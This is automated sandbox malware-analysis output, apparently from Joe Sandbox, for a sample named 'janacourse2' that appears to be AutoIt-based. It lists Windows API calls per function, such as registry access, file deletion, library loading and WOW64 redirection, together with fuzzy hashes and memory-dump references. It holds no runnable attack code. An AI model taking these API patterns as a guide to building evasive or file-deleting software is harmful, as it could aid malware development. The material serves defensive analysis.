                                                                                                            • Instruction Fuzzy Hash: 2F416EB1A00204AFDB25CF94C984ADA7FA9EF49310F1480ADFD459F20DD7B9D945CBA0
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01043E35
                                                                                                            • IsMenu.USER32(?), ref: 01043E4A
                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01043E92
                                                                                                            • DrawMenuBar.USER32 ref: 01043EA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                            • Opcode ID: a66b24b8b7a7bc645fd023374eb602e29921034ec2f861b77274770dd3473859
                                                                                                            • Instruction ID: 16a2da9fddc7a5351727ffdbf13f3b5a79b1916553ef516e0ee7de22b1ef075b
                                                                                                            • Opcode Fuzzy Hash: a66b24b8b7a7bc645fd023374eb602e29921034ec2f861b77274770dd3473859
                                                                                                            • Instruction Fuzzy Hash: 97418AB4A02219AFEB20DF55D8C0AAEBBF5FF48350F044069E9959B280D335A941CF90
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01011E66
                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01011E79
                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 01011EA9
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                            • Opcode ID: eb1d6550a0987c0faabdee8b193b2d878f7435b2a9a252f8da23e293e3a150e9
                                                                                                            • Instruction ID: f4022adff907f6690d519f034b3039043164d512d3615f9c91d33a34eef924c1
                                                                                                            • Opcode Fuzzy Hash: eb1d6550a0987c0faabdee8b193b2d878f7435b2a9a252f8da23e293e3a150e9
                                                                                                            • Instruction Fuzzy Hash: 892146B1A00108ABEB18ABB5DD85CFFBBF8EF45350B004019F691971D5DB3C49099A20
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                            • API String ID: 176396367-4004644295
                                                                                                            • Opcode ID: aec8cd0cee933ecde509f05ce2876ef0665e2777ff510d36c30bc53373ecc130
                                                                                                            • Instruction ID: 608d9d2017a5d7b19515ce0c67050ccd5f93a9b6303f63d51233cd654da3ede0
                                                                                                            • Opcode Fuzzy Hash: aec8cd0cee933ecde509f05ce2876ef0665e2777ff510d36c30bc53373ecc130
                                                                                                            • Instruction Fuzzy Hash: D1313973A009614BEB61EF2DDE500BE37D95BD1688F15409BE8C1FB34AEA71CD4293A0
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01042F8D
                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 01042F94
                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01042FA9
                                                                                                            • DestroyWindow.USER32(?), ref: 01042FB1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                            • String ID: SysAnimate32
                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                            • Opcode ID: 8bb910d8fda42157a4e7aecf6c59afce0c5dfa11506a949ae4825b9ec170e7e1
                                                                                                            • Instruction ID: e5f58bf248f8c988e75e84680def7dc48fac58848e103cf87334c515215ebd48
                                                                                                            • Opcode Fuzzy Hash: 8bb910d8fda42157a4e7aecf6c59afce0c5dfa11506a949ae4825b9ec170e7e1
                                                                                                            • Instruction Fuzzy Hash: F121DEB1300209ABEB214E68ECC0EBB3BA9EB48364F504278FA90D2091C372EC419760
                                                                                                            APIs
                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FD4D1E,00FE28E9,?,00FD4CBE,00FE28E9,010788B8,0000000C,00FD4E15,00FE28E9,00000002), ref: 00FD4D8D
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FD4DA0
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00FD4D1E,00FE28E9,?,00FD4CBE,00FE28E9,010788B8,0000000C,00FD4E15,00FE28E9,00000002,00000000), ref: 00FD4DC3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: fd2d4744d1f2f205fbb063bd891fb5ffd138eff7392096b69adc96dd6a70a3fd
                                                                                                            • Instruction ID: 44d3905c96a8fc9279102ac3059f8464e27b10b80c6d88ae12a1518c5b9483ad
                                                                                                            • Opcode Fuzzy Hash: fd2d4744d1f2f205fbb063bd891fb5ffd138eff7392096b69adc96dd6a70a3fd
                                                                                                            • Instruction Fuzzy Hash: 58F0A474901208BBEB219F90D949BAEBFB6EF04711F040059F845A2254CB355940DB90
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32 ref: 0100D3AD
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100D3BF
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0100D3E5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                                                            • API String ID: 145871493-2590602151
                                                                                                            • Opcode ID: 73ae6075cbdac3a0c9f2c299308600f1c15381370f6473e8facf2dbd82024cca
                                                                                                            • Instruction ID: e0450fce7df5dea39510a0a89aa6de3335f4a0ccfa8e829dc27f37c822884234
                                                                                                            • Opcode Fuzzy Hash: 73ae6075cbdac3a0c9f2c299308600f1c15381370f6473e8facf2dbd82024cca
                                                                                                            • Instruction Fuzzy Hash: 48F0ECF6807511EBF77316D48EA8A5DB754AF21711F44C199F5C1F1089D730C94087B5
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FB4EDD,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E9C
                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB4EAE
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00FB4EDD,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4EC0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                            • API String ID: 145871493-3689287502
                                                                                                            • Opcode ID: ebaffc34eaad8f2c0c9734adf0a5ccaf7ffbabe9e7526935e2aa2b9f90ea895a
                                                                                                            • Instruction ID: 51bf79ac5a5e4488bd8078d1b13a2dd845d1e316dab4edd1effd0882b044ca12
                                                                                                            • Opcode Fuzzy Hash: ebaffc34eaad8f2c0c9734adf0a5ccaf7ffbabe9e7526935e2aa2b9f90ea895a
                                                                                                            • Instruction Fuzzy Hash: F9E0CDB9E035225BF331172B6F58B9F7554AF82F72B050115FC40D6505DB75DC019AE1
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FF3CDE,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E62
                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB4E74
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00FF3CDE,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                            • API String ID: 145871493-1355242751
                                                                                                            • Opcode ID: 31cf329813335ee0eca06401c18e4f21ee5499bac5bb6de1107349626e6e0754
                                                                                                            • Instruction ID: 0f59065571f85838a0c17b644b05936c576652ba6fcfde8c7ff69ba1bb04a6fc
                                                                                                            • Opcode Fuzzy Hash: 31cf329813335ee0eca06401c18e4f21ee5499bac5bb6de1107349626e6e0754
                                                                                                            • Instruction Fuzzy Hash: 6AD0C2B9D03A215767321B266B18ECB2B18AF82B213050124B840A6118CF26DD01EAE0
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01022C05
                                                                                                            • DeleteFileW.KERNEL32(?), ref: 01022C87
                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01022C9D
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01022CAE
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01022CC0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Delete$Copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3226157194-0
                                                                                                            • Opcode ID: a9633b6ce86fcc9d55e740875e46fc654133ea5062c0216e8a48d03ab825ac5f
                                                                                                            • Instruction ID: 4454a42e06dea6b9514a4008952dd099d8cebb6c2ede8040e1e97a1d5ac0ed35
                                                                                                            • Opcode Fuzzy Hash: a9633b6ce86fcc9d55e740875e46fc654133ea5062c0216e8a48d03ab825ac5f
                                                                                                            • Instruction Fuzzy Hash: EAB15D72900129ABDF21EBE4CD85EDEBBBDEF48350F1040A6F649A7141EA359A448F61
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0103A427
                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0103A435
                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0103A468
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0103A63D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3488606520-0
                                                                                                            • Opcode ID: 158ae974d5f6037cda8bee9b91d046734df826a434c51a4d69bd76ef600d9cc2
                                                                                                            • Instruction ID: b4d231edb12c41bf356f03f0b7ec0de7484956592c0ef9bc2e12fb439479d026
                                                                                                            • Opcode Fuzzy Hash: 158ae974d5f6037cda8bee9b91d046734df826a434c51a4d69bd76ef600d9cc2
                                                                                                            • Instruction Fuzzy Hash: 9CA1B071604301AFE720DF29C986F2AB7E5AF88714F14885CF59ADB2D2DB74EC418B91
                                                                                                            APIs
                                                                                                              • Part of subcall function 0101DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0101CF22,?), ref: 0101DDFD
                                                                                                              • Part of subcall function 0101DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0101CF22,?), ref: 0101DE16
                                                                                                              • Part of subcall function 0101E199: GetFileAttributesW.KERNEL32(?,0101CF95), ref: 0101E19A
                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0101E473
                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0101E4AC
                                                                                                            • _wcslen.LIBCMT ref: 0101E5EB
                                                                                                            • _wcslen.LIBCMT ref: 0101E603
                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0101E650
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 3183298772-0
                                                                                                            • Opcode ID: 5a7465447527d08770c884198edf3b01354a444f1253889f5cc5ac1222a67d5b
                                                                                                            • Instruction ID: 5f4361283c815b5b9d05ca07dfe232bd8fdc6c537d032ff015d0ea5050511f8d
                                                                                                            • Opcode Fuzzy Hash: 5a7465447527d08770c884198edf3b01354a444f1253889f5cc5ac1222a67d5b
                                                                                                            • Instruction Fuzzy Hash: D65180B24083459BD765EBA4DC809DF77ECAF84340F00491EEAC9D3145EE78E2888B66
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 0103C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103B6AE,?,?), ref: 0103C9B5
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103C9F1
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA68
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA9E
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103BAA5
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103BB00
                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0103BB63
                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0103BBA6
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0103BBB3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                            • String ID:
                                                                                                            • API String ID: 826366716-0
                                                                                                            • Opcode ID: 88ad0ab6442e6e56ac83482c6223e44b2312b16c61c8ce568ddca4d5630be794
                                                                                                            • Instruction ID: 9737f4aa2693c3230dcca1c2647a0d0e00168365656be521d3a32cfc0f401709
                                                                                                            • Opcode Fuzzy Hash: 88ad0ab6442e6e56ac83482c6223e44b2312b16c61c8ce568ddca4d5630be794
                                                                                                            • Instruction Fuzzy Hash: 7961B171208201AFD324DF14C890E6ABBE9FF84308F54859DF5998B292CB75ED45CB92
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 01018BCD
                                                                                                            • VariantClear.OLEAUT32 ref: 01018C3E
                                                                                                            • VariantClear.OLEAUT32 ref: 01018C9D
                                                                                                            • VariantClear.OLEAUT32(?), ref: 01018D10
                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01018D3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                            • String ID:
                                                                                                            • API String ID: 4136290138-0
                                                                                                            • Opcode ID: 8c8ad6e68ca53de36dc1a108329d98edd1d5c1f5157f5c7cd1a46d13dae8977c
                                                                                                            • Instruction ID: 83822d41ba9070006524ba6143e1c7f7a4bbfdd74684e93a158bb5848bea2275
                                                                                                            • Opcode Fuzzy Hash: 8c8ad6e68ca53de36dc1a108329d98edd1d5c1f5157f5c7cd1a46d13dae8977c
                                                                                                            • Instruction Fuzzy Hash: 32515AB5A00219EFDB10DF68C884AAABBF4FF89310F05855AF945DB314E734EA11CB90
                                                                                                            APIs
                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 01028BAE
                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 01028BDA
                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 01028C32
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 01028C57
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 01028C5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
